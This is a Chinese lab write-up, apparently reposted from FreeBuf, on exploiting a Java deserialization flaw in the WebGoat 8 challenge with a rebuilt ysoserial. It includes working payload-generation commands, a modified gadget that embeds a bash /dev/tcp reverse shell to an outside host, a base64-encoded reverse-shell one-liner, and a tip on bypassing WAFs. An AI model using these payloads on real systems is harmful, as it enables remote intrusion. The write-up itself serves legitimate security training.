Java反序列化漏洞:在受限环境中从漏洞发现到获取反向Shell
前言
Java反序列化漏洞可以说是Java安全的一块心病,近年来更是在安全界“出尽风头”。其实说到Java反序列化的问题,早在2015年年初的在AppSecCali大会上,两名安全研究人员Chris Frohoff 和 Gabriel Lawrence发表了一篇题为《Marshalling Pickles》的报告,就详细描述了Java反序列化漏洞可以利用Apache Commons Collections这个常用的Java库来实现任意代码执行,甚至还提供了相应的Payload生成工具ysoserial。
通过对象序列化,开发人员可将内存中对象转换为二进制和文本数据格式进行存储或传输。但是,从不受信任的数据反序列化对象可能会导致攻击者实现远程代码执行。
本文我将以WebGoat 8中的反序列化挑战(部署在Docker上)为例,向大家展示完成该挑战并进一步获取目标反向shell的完整过程。
漏洞发现
正如挑战中所提到的,易受攻击的页面从用户输入中获取Base64格式的序列化Java对象,并不加过滤的对其进行反序列化操作。我们将通过提供一个序列化对象来利用这个漏洞,该对象将触发面向属性的编程链(POP链)以在反序列化期间实现远程命令执行。
启动Burp并安装一个名为Java-Deserialization-Scanner的插件。该插件主要包括2个功能:扫描以及基于ysoserial生成exploit。
扫描远程端点后,Burp插件将向我们返回以下报告内容:
Hibernate 5 (Sleep): Potentially VULNERABLE!!!
是个好消息!
漏洞利用
现在,让我们继续下一步操作。点击exploitation选项卡以实现任意命令执行。
从提示信息来看,这个错误应该来自ysoserial。我们回到控制台看看究竟是什么问题。
通过观察ysoserial,我看到有两种不同的POP链可用于Hibernate。但使用这些payload后,我发现它们都没有在目标系统上成功执行。
那么,插件又是如何生成payload来触发sleep命令的呢?
我决定查看插件的源码:
https://github.com/federicodotta/Java-Deserialization-Scanner/blob/master/src/burp/BurpExtender.java
经过一番仔细查看,我发现原来payload在插件的源码中是硬编码的。因此,我们需要找到一种方法来生成相同的payload以使其正常工作。
基于一些研究和帮助我发现,通过修改当前版本的ysoserial可以使我们的payload正常工作。我下载了ysoserial的源码,并决定使用Hibernate 5重新对其进行编译。想要使用Hibernate 5成功构建ysoserial,我们还需要将javax.el包添加到pom.xml文件中。
此外,我还向原始项目发送了一个Pull请求,以便在选择hibernate5配置文件时修复构建。
现在,我们就可以使用以下命令开始重新构建ysoserial了:
mvn clean package -DskipTests -Dhibernate5
然后,我们使用以下命令来生成payload:
java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/test" | base64 -w0
我们可以通过以下命令访问docker容器,来验证我们的命令是否已成功执行:
docker exec -it <CONTAINER_ID> /bin/bash
可以看到我们的payload已在目标机器上成功执行了!
我们继续枚举目标机器上的二进制文件。
webgoat@1d142ccc69ec:/$ which php
webgoat@1d142ccc69ec:/$ which python
webgoat@1d142ccc69ec:/$ which python3
webgoat@1d142ccc69ec:/$ which wget
webgoat@1d142ccc69ec:/$ which curl
webgoat@1d142ccc69ec:/$ which nc
webgoat@1d142ccc69ec:/$ which perl
/usr/bin/perl
webgoat@1d142ccc69ec:/$ which bash
/bin/bash
webgoat@1d142ccc69ec:/$
只有Perl和Bash可用。让我们尝试生成一个可向我们发送反向shell的payload。
以下是Pentest Monkeys上的一些单行反向shell:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
我决定尝试Bash反向shell:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
但你可能知道java.lang.Runtime.exec()具有一定的局限性,它不支持重定向或管道等shell操作符。
让我们试试Java编写的反向shell。我将修改Gadgets.java上的源码,来生成反向shell payload。
以下是我们需要修改的路径:
/root/ysoserial/src/main/java/ysoserial/payloads/util/Gadgets.java
从第116到118行。
下面是Pentest Monkeys上提到的一个Java反向shell,但依然无法正常工作:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
在进行了一番修改后,结果如下:
String cmd = "java.lang.Runtime.getRuntime().exec(new String []{"/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"}).waitFor();";
clazz.makeClassInitializer().insertAfter(cmd);
让我们再次重建ysoserial,并测试生成的payload。
可以看到,这次我们成功获取到了一个反向shell!
太棒了!
Payload生成过程概述
在研究过程中,我们发现了这个编码器,它也可以帮助我们完成这个任务:
http://jackson.thuraisamy.me/runtime-exec-payloads.html
通过以下Bash反向shell命令:
bash -i >& /dev/tcp/[IP address]/[port] 0>&1
将会为我们生成如下payload:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}
另外,该编码器还可用于绕过WAF哦!不信你就试试~
参考文献
1、https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ 2、http://www.pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/ 3、https://github.com/frohoff/ysoserial 4、https://github.com/federicodotta/Java-Deserialization-Scanner
*参考来源:medium,FB小编secist编译,转载请注明来自FreeBuf.COM
- hdu----(1677)Nested Dolls(DP/LIS(二维))
- hdu----(1950)Bridging signals(最长递增子序列 (LIS) )
- hdu------(1757)A Simple Math Problem(简单矩阵快速幂)
- python实现Tab自动补全功能
- hdu-----(2807)The Shortest Path(矩阵+Floyd)
- hdu----(4686)Arc of Dream(矩阵快速幂)
- HDU----(4549)M斐波那契数列(小费马引理+快速矩阵幂)
- Centos系统修改时区
- zookeeper思考与总结1:在其它组件的作用及hdfs对比
- HDU----(4291)A Short problem(快速矩阵幂)
- Linux下删除指定文件之外的其他文件
- HDU----(2157)How many ways??(快速矩阵幂)
- 试试Linux下的ip命令
- hdu---(2604)Queuing(矩阵快速幂)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Android中menu使用详解
- SimpleCommand框架介绍以及简单使用(一)
- Android开发中使用achartengine绘制各种图表的方法
- Android开发中Listview动态加载数据的方法示例
- Android自定义实现顶部粘性下拉刷新效果
- Android开发使用自定义view实现ListView下拉的视差特效功能
- Android打造炫酷进度条效果
- Android开发实现自定义新闻加载页面功能实例
- Android下Activity间通信序列化过程中的深浅拷贝浅析
- Android升级支持库版本遇到的两个问题详解
- Android开发使用Drawable绘制圆角与圆形图案功能示例
- Android开发中自定义ProgressBar控件的方法示例
- Android 使用自定义RecyclerView控件实现Gallery效果
- Android开发中GridView用法示例
- React Native中Android物理back键按两次返回键即退出应用